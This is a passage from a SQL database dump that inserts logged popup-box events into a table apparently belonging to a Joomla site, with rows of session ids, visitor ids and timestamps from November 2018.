(31171, '0744b29781cff9fcb9b8382f05b61259', '64214bdd4b5a4b70', 0, 2, 1, '2018-11-19 19:31:28'),
(31172, '0744b29781cff9fcb9b8382f05b61259', '64214bdd4b5a4b70', 0, 2, 1, '2018-11-19 19:31:55'),
(31173, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 19:33:49'),
(31174, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 19:35:08'),
(31175, 'a8ac9636fe23532bf6816bc4f87c71e8', '7f9e7d43d560668a', 0, 2, 1, '2018-11-19 19:40:24'),
(31176, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 19:55:24'),
(31177, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 19:57:10'),
(31178, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 19:57:58'),
(31179, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 19:59:09'),
(31180, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:00:10'),
(31181, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:00:18'),
(31182, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:00:30'),
(31183, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:00:44'),
(31184, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:00:59'),
(31185, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:01:09'),
(31186, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:01:16'),
(31187, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:01:18'),
(31188, '076db321b97f0b83f79480afba47d9db', 'c9696e59315cb775', 0, 2, 1, '2018-11-19 20:01:19'),
(31189, '854e5d3505c9892e02e8ec0307941ec8', 'd0a2f4733c6189c8', 0, 2, 1, '2018-11-19 20:21:54'),
(31190, '3e6602a2299d37cfb8236f92d31fd271', '20582e934bd3645b', 0, 2, 1, '2018-11-19 20:25:17'),
(31191, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 20:37:04'),
(31192, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 20:37:15'),
(31193, 'da248e3ca7baab72b68a53ba2c9fc923', 'c21b863ecdd30da4', 0, 2, 1, '2018-11-19 21:01:44'),
(31194, '5a444c8f0961baf82f2dfdec195727ff', 'b059d4726225088e', 0, 2, 1, '2018-11-19 21:22:32'),
(31195, 'c0159dfc3308775df908eca271805968', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-19 21:41:47'),
(31196, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-19 22:18:16'),
(31197, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-19 22:18:29'),
(31198, 'c2cf315dfc4c27a1ea21f6d90d131265', '685a1da6e085d951', 0, 2, 1, '2018-11-19 22:18:41'),
(31199, '9676bc77bc378162e9c07d69d3ef8de1', '013fa1525395a6db', 0, 2, 1, '2018-11-20 00:22:48'),
(31200, '6011fc20047482364638e070c26fa4ef', 'e57e35571141fb08', 0, 2, 1, '2018-11-20 02:22:45'),
(31201, '868ac48954ab17ba22dce12bf54962b9', 'ec39ae38b38c2e75', 0, 2, 1, '2018-11-20 02:37:49'),
(31202, '245868349a905e5047990b92dc44af79', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-20 05:13:51');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(31203, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:07:09'),
(31204, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:13:10'),
(31205, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:22:09'),
(31206, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:22:26'),
(31207, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:23:59'),
(31208, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:39:41'),
(31209, '8460e38ba38556a02ca6dc64a517d69f', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 06:40:17'),
(31210, '9088e7c475ae31b366447615a5ba17f1', '5607757a84149e2b', 0, 2, 1, '2018-11-20 06:51:57'),
(31211, '4e04143476a4fb6b9eb4216dc2f36275', 'a544a8415de74fe5', 0, 2, 1, '2018-11-20 07:11:18'),
(31212, '480d894e298b70feea18ebd5a4e2fda1', 'b7954252ad052b1f', 0, 2, 1, '2018-11-20 07:11:46'),
(31213, '5fcdf8e79369e80cd005da8963da5464', '381aa1d8da306be0', 0, 2, 1, '2018-11-20 07:23:12'),
(31214, '9a25180420bc70294467c1857dd9b636', '35499e9f9fe30143', 0, 2, 1, '2018-11-20 07:30:19'),
(31215, '5925fca59315fb682e0da9c97c150073', '02c64442bb86b29a', 0, 2, 1, '2018-11-20 07:32:25'),
(31216, 'f05132fc411a40a8634bbabf976dd82e', '6bd13e58dbc85e14', 0, 2, 1, '2018-11-20 08:13:15'),
(31217, '0a6ed9327f4d86ab3f67c1d32a5ea877', 'b73b38d0d22fd496', 0, 2, 1, '2018-11-20 08:13:47'),
(31218, '809906dbdc299831f4860d2a8720eadc', '67ab708967caf6ea', 0, 2, 1, '2018-11-20 08:14:17'),
(31219, '2df7baf3645aaa5057e61f8a3ade3473', '50d02461c9e1908b', 0, 2, 1, '2018-11-20 09:27:41'),
(31220, 'c7e21bb3fab405cfdac614c70f6dc859', '3f091d974d4cf69a', 0, 2, 1, '2018-11-20 11:20:16'),
(31221, '6b1f6790d604000668447fa36b8ff225', '05e28c1de0f2a4d6', 0, 2, 1, '2018-11-20 11:53:23'),
(31222, '114afb971a5c0be93b435e6bda58240e', '355aaca9458220d0', 0, 2, 1, '2018-11-20 12:01:54'),
(31223, '98806b3a9362608b242cc9fc67c18c3d', '39ff1f2f51012c7c', 0, 2, 1, '2018-11-20 12:13:35'),
(31224, '409e05a0c6975c3d322795819da7ad53', '633baff4a552045a', 0, 2, 1, '2018-11-20 12:16:16'),
(31225, '409e05a0c6975c3d322795819da7ad53', '633baff4a552045a', 0, 2, 1, '2018-11-20 12:32:44'),
(31226, '098a42bf274a13755e9e9a5c17585fd3', '3720e464c782ec77', 0, 2, 1, '2018-11-20 13:28:05'),
(31227, 'a8ea0fc2417df0cafc3d233f243ae4fe', 'e598745d36e98349', 0, 2, 1, '2018-11-20 13:46:34'),
(31228, 'a8ea0fc2417df0cafc3d233f243ae4fe', 'e598745d36e98349', 0, 2, 1, '2018-11-20 13:46:56'),
(31229, '4e4b46081b6d8efd261cbbdb09c878e5', '1027c0f1dc1f343d', 0, 2, 1, '2018-11-20 14:26:05'),
(31230, '26ea1c1a92a5461b05891907152192be', 'b080d5bdc24e457d', 0, 2, 1, '2018-11-20 14:26:32'),
(31231, '5ffedeafdd63caa5a36116da44b6b97b', '6f32da85f2d6d4e4', 0, 2, 1, '2018-11-20 15:04:50'),
(31232, '81d627dcca57e39eb0e0a6c649932e1b', 'fd922144c076f577', 0, 2, 1, '2018-11-20 15:51:35'),
(31233, '81d627dcca57e39eb0e0a6c649932e1b', 'fd922144c076f577', 0, 2, 1, '2018-11-20 15:52:21'),
(31234, '81d627dcca57e39eb0e0a6c649932e1b', 'fd922144c076f577', 0, 2, 1, '2018-11-20 15:52:37'),
(31235, '1fbb644cc37d29c23e931e4e9f884f02', '1586b5d01f19f069', 0, 2, 1, '2018-11-20 16:21:23'),
(31236, '0ca0481626237f38845b619464cc659c', '786cd989a2377f36', 0, 2, 1, '2018-11-20 16:51:02'),
(31237, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-20 17:29:36'),
(31238, 'e5ac04358a719447e4ed46a9235ce9bb', '819477a20772ca36', 0, 2, 1, '2018-11-20 17:44:17'),
(31239, 'e5ac04358a719447e4ed46a9235ce9bb', '819477a20772ca36', 0, 2, 1, '2018-11-20 17:45:02'),
(31240, 'd7194ba55489a99454ec7aee635c75f6', 'd49d107e4c484831', 0, 2, 1, '2018-11-20 17:57:15'),
(31241, 'bcfcd17665532a2d1c8f06f4f078308a', '2f12db6be1159092', 0, 2, 1, '2018-11-20 18:03:59'),
(31242, 'bcfcd17665532a2d1c8f06f4f078308a', '2f12db6be1159092', 0, 2, 1, '2018-11-20 18:04:23'),
(31243, '6bea0d7a7efbee767d1863f170003d9e', '11dac0eba05d0744', 0, 2, 1, '2018-11-20 18:57:48'),
(31244, 'fe29c0b14b5e3bdf48ed0b58aa5a7f13', '5aecf502d29458eb', 0, 2, 1, '2018-11-20 19:05:34'),
(31245, '5aa56cd31e1ed836b4509450109eebd1', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 19:05:58'),
(31246, '6253751d45114fd2657d1745f422191d', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-20 19:26:34'),
(31247, '834fb60182a3993db8f22d266e252ad8', '2ac73fd527e16579', 0, 2, 1, '2018-11-20 19:49:05'),
(31248, 'c843e8b1c3bfd41869d63e46f0c594d2', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-20 19:49:26'),
(31249, '62b463ece478bf6a09c682f87a65d8c9', '30c192082892c58a', 0, 2, 1, '2018-11-20 20:32:41'),
(31250, '33a9dff70a6cf5803321f094815a0ae8', 'a932dd858a994dbe', 0, 2, 1, '2018-11-20 21:53:47'),
(31251, '41967b7aafb148805416534ffce03de3', '7ea81b508aafee86', 0, 2, 1, '2018-11-20 22:18:50'),
(31252, '41967b7aafb148805416534ffce03de3', '7ea81b508aafee86', 0, 2, 1, '2018-11-20 22:20:21'),
(31253, '41967b7aafb148805416534ffce03de3', '7ea81b508aafee86', 0, 2, 1, '2018-11-20 22:20:32'),
(31254, 'f55b172234fe64d40ff4afcb7706d362', '9cacadbdb89afbf7', 0, 2, 1, '2018-11-20 22:38:43'),
(31255, '915f22676b24081e2964423d88c372df', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 22:42:23'),
(31256, '915f22676b24081e2964423d88c372df', 'ccdfa4c67082a494', 0, 2, 1, '2018-11-20 22:43:28'),
(31257, '2115decf924b5955b697e43079a47b34', '50d446c6a64581de', 0, 2, 1, '2018-11-21 00:29:51'),
(31258, 'fdd05c22b812a0a164086f305b9555a8', 'bd58b6fb6db4f8c8', 0, 2, 1, '2018-11-21 01:18:06'),
(31259, '255fdc91d592e81e9ac950ecc685351b', '4e30dd84e78d00b1', 0, 2, 1, '2018-11-21 02:32:29'),
(31260, '90eaad955467db121a270c78278faae8', 'e3f16eb055dd65bb', 0, 2, 1, '2018-11-21 02:32:29'),
(31261, '88248a2c6c829c197de86b10db211d2d', '48d28d29c37c983b', 0, 2, 1, '2018-11-21 03:16:55'),
(31262, '40d45c8bb68be4e150f68b7a9f8576b1', '17b08a780038efb5', 0, 2, 1, '2018-11-21 05:01:28'),
(31263, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-21 05:05:01'),
(31264, '83348a3eb505280a22b394498f3b9ad8', '8b97a34529bdac59', 0, 2, 1, '2018-11-21 05:13:25'),
(31265, 'c0c54a0ef477d4c31f3cbabde8bd5942', '16fc05036e2a1ddf', 0, 2, 1, '2018-11-21 05:14:31'),
(31266, '1522508861450903c6e3614edb5cc930', 'cd1a0484eec66334', 0, 2, 1, '2018-11-21 05:26:12'),
(31267, '9f34cb439f78365686fd3aa7af427c2d', 'ec744878c7525ba7', 0, 2, 1, '2018-11-21 05:35:04'),
(31268, '9f34cb439f78365686fd3aa7af427c2d', 'ec744878c7525ba7', 0, 2, 1, '2018-11-21 05:39:21'),
(31269, '9f34cb439f78365686fd3aa7af427c2d', 'ec744878c7525ba7', 0, 2, 1, '2018-11-21 05:39:52'),
(31270, '9f34cb439f78365686fd3aa7af427c2d', 'ec744878c7525ba7', 0, 2, 1, '2018-11-21 05:40:38'),
(31271, '2e672f49baa95e3be6b8fcdb3960ffbc', '5572c62607a7ffe3', 0, 2, 1, '2018-11-21 06:04:02'),
(31272, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-21 06:34:18'),
(31273, '03294b1423ad08e7b0d615cb183bff49', '1e0748a278cb6aa8', 0, 2, 1, '2018-11-21 06:38:55'),
(31274, 'f990bb2478db0165afcf8eae3a5bab53', '0e17403daffa1f88', 0, 2, 1, '2018-11-21 07:11:39'),
(31275, 'a89aabc7814a4861eb910b54f2f96a0b', '3e166713e91e6277', 0, 2, 1, '2018-11-21 08:08:11'),
(31276, '51f67302fa58c9b5f874cd3271db4626', '1bcdbcfb3c77891d', 0, 2, 1, '2018-11-21 08:20:30'),
(31277, '2dbee4e3cf4065c51e8bfc7065a2d55d', 'dc9b210db861c5cc', 0, 2, 1, '2018-11-21 08:30:38'),
(31278, '20012d10bcfdaeae3db57e0da5529749', '03a665daf4a52652', 0, 2, 1, '2018-11-21 09:03:04'),
(31279, '3a4e09e601d632d0cdaa0d72da6148f3', 'd95bb1534d2fc9b8', 0, 2, 1, '2018-11-21 09:09:28'),
(31280, 'f5457caa28780c98f9bd6d957ee3526f', 'a5467ba381fa9fff', 0, 2, 1, '2018-11-21 09:33:23'),
(31281, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:22:21'),
(31282, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:23:44'),
(31283, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:25:02'),
(31284, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:25:23'),
(31285, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:28:52'),
(31286, '232fb988a51da1fbbc71ea84a73c5c50', 'f85de81f8eb472cb', 0, 2, 1, '2018-11-21 10:29:26'),
(31287, '629ddbdff4228db12542e8ebc2d7033a', '3a0ecf730a8444d1', 0, 2, 1, '2018-11-21 10:55:09'),
(31288, 'd81c88ebf13456826de0890a1f8eb79d', '55d4c2e266536177', 0, 2, 1, '2018-11-21 10:58:29'),
(31289, 'bb786d434f46850f01acbad86a0027c8', 'cff39324f62e7afd', 0, 2, 1, '2018-11-21 11:52:30'),
(31290, 'ecfe4ed3a8404fb6106fba67ff99be5f', '44fc9b69123b5fdf', 0, 2, 1, '2018-11-21 12:01:52'),
(31291, 'ecfe4ed3a8404fb6106fba67ff99be5f', '44fc9b69123b5fdf', 0, 2, 1, '2018-11-21 12:02:32'),
(31292, 'c628e53501d4283f031898d151a13877', 'dbff33b65249e39f', 0, 2, 1, '2018-11-21 12:04:07'),
(31293, 'bb01882ff6b9d56ab3c2485049ffd718', '51df446c19685386', 0, 2, 1, '2018-11-21 12:23:54'),
(31294, 'd81c88ebf13456826de0890a1f8eb79d', '55d4c2e266536177', 0, 2, 1, '2018-11-21 12:57:06'),
(31295, '0416db95420cd3e1e8d98465c83e56ad', '59a52fb7c71da3bb', 0, 2, 1, '2018-11-21 12:57:09'),
(31296, 'd81c88ebf13456826de0890a1f8eb79d', '55d4c2e266536177', 0, 2, 1, '2018-11-21 12:58:26'),
(31297, 'd81c88ebf13456826de0890a1f8eb79d', '55d4c2e266536177', 0, 2, 1, '2018-11-21 12:58:59'),
(31298, '246ded4a781a29ae83fcf2c05b0f2f73', '3562b07783920927', 0, 2, 1, '2018-11-21 13:31:55'),
(31299, '6da87a3b6d852b4a4b0fcc772521eaf5', '883a78a5614f915d', 0, 2, 1, '2018-11-21 13:31:55'),
(31300, '6d6efc40b828fd217db5666dc6045ed3', '854ef9f4bdac6901', 0, 2, 1, '2018-11-21 14:11:27'),
(31301, '9fd23c8fd5d2923edc4f6ed63ef90e5e', '66af2c0f2ba75d44', 0, 2, 1, '2018-11-21 14:27:55'),
(31302, 'a1a6dc73756dc67225fb708bef73076e', '53f516f3269c26b8', 0, 2, 1, '2018-11-21 14:32:41'),
(31303, '60962fb5e0535f10ccc0b38e4ae9a71f', 'ad17259865e15f1a', 0, 2, 1, '2018-11-21 14:35:55'),
(31304, '4e09748d49edb9bf212f72d277b19e7d', 'e385077fb0f24d8b', 0, 2, 1, '2018-11-21 15:41:07'),
(31305, 'd4a7428bf0ae1531ed9640a003384db6', 'fe961668877fa513', 0, 2, 1, '2018-11-21 15:41:33'),
(31306, '7f8fe6c9dbaf2ec726929bb587173ff0', '0401e62b96c2aa99', 0, 2, 1, '2018-11-21 15:43:08'),
(31307, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-21 15:45:18'),
(31308, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-21 15:45:41'),
(31309, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-21 15:56:21'),
(31310, '52099f74bdf77514f5d7fbd567a13e12', '77ec5b7d2d8ef362', 0, 2, 1, '2018-11-21 15:56:41'),
(31311, 'ea82cfedf29653845521c6d433c8972e', '32b169e936bbe5df', 0, 2, 1, '2018-11-21 16:00:24'),
(31312, '32c53950e4873a52b2ffd99ff2ff4b97', 'b4ecb18ba7992a18', 0, 2, 1, '2018-11-21 16:00:31'),
(31313, '1924130a5fdc4e41657d77b51a08bce2', 'e9272eccfa6688f2', 0, 2, 1, '2018-11-21 16:01:19'),
(31314, 'ea82cfedf29653845521c6d433c8972e', '32b169e936bbe5df', 0, 2, 1, '2018-11-21 16:01:42'),
(31315, '109b1d8d9807e8e73ede3fe50e6ec519', 'd253aa15f0650852', 0, 2, 1, '2018-11-21 16:01:46'),
(31316, '2cf5da2805cd943c80acf4d899ba917a', 'f19010d8a5f137d0', 0, 2, 1, '2018-11-21 16:02:14'),
(31317, '109b1d8d9807e8e73ede3fe50e6ec519', 'd253aa15f0650852', 0, 2, 1, '2018-11-21 16:03:28'),
(31318, 'a796f5e04d592054964e8b88ba97c840', 'b442ab7a5f0aab8c', 0, 2, 1, '2018-11-21 16:04:49'),
(31319, '109b1d8d9807e8e73ede3fe50e6ec519', 'd253aa15f0650852', 0, 2, 1, '2018-11-21 16:05:28'),
(31320, '109b1d8d9807e8e73ede3fe50e6ec519', 'd253aa15f0650852', 0, 2, 1, '2018-11-21 16:06:01'),
(31321, '32c53950e4873a52b2ffd99ff2ff4b97', 'b4ecb18ba7992a18', 0, 2, 1, '2018-11-21 16:06:05'),
(31322, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:06:36'),
(31323, 'a796f5e04d592054964e8b88ba97c840', 'b442ab7a5f0aab8c', 0, 2, 1, '2018-11-21 16:06:41'),
(31324, '32c53950e4873a52b2ffd99ff2ff4b97', 'b4ecb18ba7992a18', 0, 2, 1, '2018-11-21 16:06:50'),
(31325, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:06:57'),
(31326, '02797689039134bcac1dbd64c50df4fd', '1c68b977b911188c', 0, 2, 1, '2018-11-21 16:07:08'),
(31327, '063b1e64f0d8d9f9688738792b9157d9', 'ee15d3d6defea2e0', 0, 2, 1, '2018-11-21 16:07:15'),
(31328, '84378e4a07a6e06dab0b4ded3c3c6cba', '32cd5ee0592c3279', 0, 2, 1, '2018-11-21 16:07:25'),
(31329, '32c53950e4873a52b2ffd99ff2ff4b97', 'b4ecb18ba7992a18', 0, 2, 1, '2018-11-21 16:08:07'),
(31330, 'c6b91b840dc080dfbf7e0c24832d9338', '614fcbb79b5160d2', 0, 2, 1, '2018-11-21 16:09:06'),
(31331, '1924130a5fdc4e41657d77b51a08bce2', 'e9272eccfa6688f2', 0, 2, 1, '2018-11-21 16:09:31'),
(31332, '682ba2af3ccfe9c286c10d54886c7538', '223433ef04377e98', 0, 2, 1, '2018-11-21 16:09:40'),
(31333, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-21 16:10:03'),
(31334, '109b1d8d9807e8e73ede3fe50e6ec519', 'd253aa15f0650852', 0, 2, 1, '2018-11-21 16:10:22'),
(31335, '682ba2af3ccfe9c286c10d54886c7538', '223433ef04377e98', 0, 2, 1, '2018-11-21 16:10:25'),
(31336, 'c6b91b840dc080dfbf7e0c24832d9338', '614fcbb79b5160d2', 0, 2, 1, '2018-11-21 16:12:52'),
(31337, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:13:07'),
(31338, 'c11a41fd3637905994c45606f34a97f8', 'e706e9a0184b2202', 0, 2, 1, '2018-11-21 16:13:13'),
(31339, '0d74313fa169970e05bf8c65885e521d', '46713cac27a94b83', 0, 2, 1, '2018-11-21 16:13:53'),
(31340, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:14:02'),
(31341, '0d74313fa169970e05bf8c65885e521d', '46713cac27a94b83', 0, 2, 1, '2018-11-21 16:14:07'),
(31342, '35efc6a90f0054a1f80e0fb8b5de4fe2', '94526f1094c8a3e4', 0, 2, 1, '2018-11-21 16:14:57'),
(31343, '682ba2af3ccfe9c286c10d54886c7538', '223433ef04377e98', 0, 2, 1, '2018-11-21 16:15:06'),
(31344, 'db98cbfe9ae66f9d79eb436f6a2a6eae', 'cd931064f096776b', 0, 2, 1, '2018-11-21 16:16:23'),
(31345, 'c6b91b840dc080dfbf7e0c24832d9338', '614fcbb79b5160d2', 0, 2, 1, '2018-11-21 16:16:42'),
(31346, 'd5839513b01cc703f40d615b55df07dc', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-11-21 16:16:44'),
(31347, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:17:13'),
(31348, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:17:30'),
(31349, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:17:46'),
(31350, '57a82ccae8f78a04412653bb82c9f881', '5c40fd54cbe625ac', 0, 2, 1, '2018-11-21 16:17:57'),
(31351, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:17:59'),
(31352, '0935c51aba33e3f0cee0748ccba3645c', 'b442ab7a5f0aab8c', 0, 2, 1, '2018-11-21 16:18:03'),
(31353, '682ba2af3ccfe9c286c10d54886c7538', '223433ef04377e98', 0, 2, 1, '2018-11-21 16:18:32'),
(31354, '12cef3d9d2ab4059dfbe17ae67a53ffa', '4fa83dd66d754b91', 0, 2, 1, '2018-11-21 16:18:49'),
(31355, 'abaecc84df7f0f7294ca98195ff2f7ed', '18e799c7f90a4e00', 0, 2, 1, '2018-11-21 16:19:26'),
(31356, 'fa57c46210c40df95b2296682f34a7cc', '5c40fd54cbe625ac', 0, 2, 1, '2018-11-21 16:21:01'),
(31357, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-21 16:21:08'),
(31358, '514fb8ded5fbfa641ab005765b5b2b5d', '0e0839ca9932578a', 0, 2, 1, '2018-11-21 16:21:46'),
(31359, '55e5bbe6d34148df7a359878d4a48022', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-21 16:30:00'),
(31360, 'faad62f28be61cca2fc747f785420b0c', '919a2b59ba1a0472', 0, 2, 1, '2018-11-21 16:32:02'),
(31361, 'd77a21b903780cf31cb7ad87b5b4dd91', '574f64490fa2f7bf', 0, 2, 1, '2018-11-21 16:32:15'),
(31362, '6a9106f2ff48e6904e293bdc742e865e', 'ef40e51ef179414e', 0, 2, 1, '2018-11-21 16:32:20'),
(31363, 'b873b12f52dd5050d367fa45114d72ed', '049dbeed11095c77', 0, 2, 1, '2018-11-21 16:35:02'),
(31364, 'ee4ba4fe4aeee3c886d5e5a9f9615fab', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-21 16:35:05'),
(31365, 'b873b12f52dd5050d367fa45114d72ed', '049dbeed11095c77', 0, 2, 1, '2018-11-21 16:35:20'),
(31366, 'abf1e736044f48a74ee553340a7cd5f4', 'f44735708b8f2c4b', 0, 2, 1, '2018-11-21 16:35:52'),
(31367, '979053ff8ba79f0a70ec4ef62de62835', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-21 16:36:26'),
(31368, '35efc6a90f0054a1f80e0fb8b5de4fe2', '94526f1094c8a3e4', 0, 2, 1, '2018-11-21 16:36:44'),
(31369, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:36:48'),
(31370, 'd3790b59354566475e528feb751e1288', '65e1b73cf3be5c3f', 0, 2, 1, '2018-11-21 16:39:42'),
(31371, 'd81c88ebf13456826de0890a1f8eb79d', '55d4c2e266536177', 0, 2, 1, '2018-11-21 16:39:52'),
(31372, 'bb62016ed4f2fb0d69d181a4662afc7b', '7501b42c35accff7', 0, 2, 1, '2018-11-21 16:41:06'),
(31373, '539a012d1613181784be8ca06aa0d3ac', '29608a328df169fa', 0, 2, 1, '2018-11-21 16:41:15'),
(31374, 'a68b80b0e2a640661f82fdc00e97c83d', '74aba437eea39f30', 0, 2, 1, '2018-11-21 16:41:28'),
(31375, 'b873b12f52dd5050d367fa45114d72ed', '049dbeed11095c77', 0, 2, 1, '2018-11-21 16:41:32'),
(31376, '539a012d1613181784be8ca06aa0d3ac', '29608a328df169fa', 0, 2, 1, '2018-11-21 16:41:41'),
(31377, '6a9106f2ff48e6904e293bdc742e865e', 'ef40e51ef179414e', 0, 2, 1, '2018-11-21 16:41:51'),
(31378, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:42:19'),
(31379, 'd5839513b01cc703f40d615b55df07dc', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-11-21 16:42:46'),
(31380, 'cf6bddb59f4c5638dfec60110bb5607f', 'dace6e0c219330fc', 0, 2, 1, '2018-11-21 16:42:52'),
(31381, 'fd2ba5258689b3816c122ff1c22def41', 'cd931064f096776b', 0, 2, 1, '2018-11-21 16:43:38'),
(31382, '3926e950c9e430ff87a1e635387ea8ca', 'f2dcff99c6fde162', 0, 2, 1, '2018-11-21 16:44:02'),
(31383, '5c3480285b04c8c755fec44f901684df', 'e216e7808556cb4e', 0, 2, 1, '2018-11-21 16:44:06'),
(31384, '3926e950c9e430ff87a1e635387ea8ca', 'f2dcff99c6fde162', 0, 2, 1, '2018-11-21 16:44:23'),
(31385, '35efc6a90f0054a1f80e0fb8b5de4fe2', '94526f1094c8a3e4', 0, 2, 1, '2018-11-21 16:44:54'),
(31386, 'ee4ba4fe4aeee3c886d5e5a9f9615fab', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-21 16:45:25'),
(31387, '1f4fac0ece10c75eceb8a7f2a8ff0d55', '4f8b12a2c3c8c52a', 0, 2, 1, '2018-11-21 16:45:52'),
(31388, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-11-21 16:46:31'),
(31389, 'b873b12f52dd5050d367fa45114d72ed', '049dbeed11095c77', 0, 2, 1, '2018-11-21 16:46:43'),
(31390, '5c3480285b04c8c755fec44f901684df', 'e216e7808556cb4e', 0, 2, 1, '2018-11-21 16:46:52'),
(31391, 'd947fdf602495cd0cca151330d52a4a6', '57587ada79ea2aa6', 0, 2, 1, '2018-11-21 16:48:03'),
(31392, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-11-21 16:48:55'),
(31393, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:49:05'),
(31394, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:49:14'),
(31395, '2df4bbeb43d50130fa29dca5edf4f7b4', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-21 16:49:56'),
(31396, '2df4bbeb43d50130fa29dca5edf4f7b4', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-21 16:50:31'),
(31397, 'b6c680278417ca9aaf48c04378c53c67', '3de88ff4581dab27', 0, 2, 1, '2018-11-21 16:50:44'),
(31398, '5c3480285b04c8c755fec44f901684df', 'e216e7808556cb4e', 0, 2, 1, '2018-11-21 16:51:38'),
(31399, 'b4018ce6d501cc48391957b9bb3af6a5', 'c5cb4fe55b6b1b30', 0, 2, 1, '2018-11-21 16:51:57'),
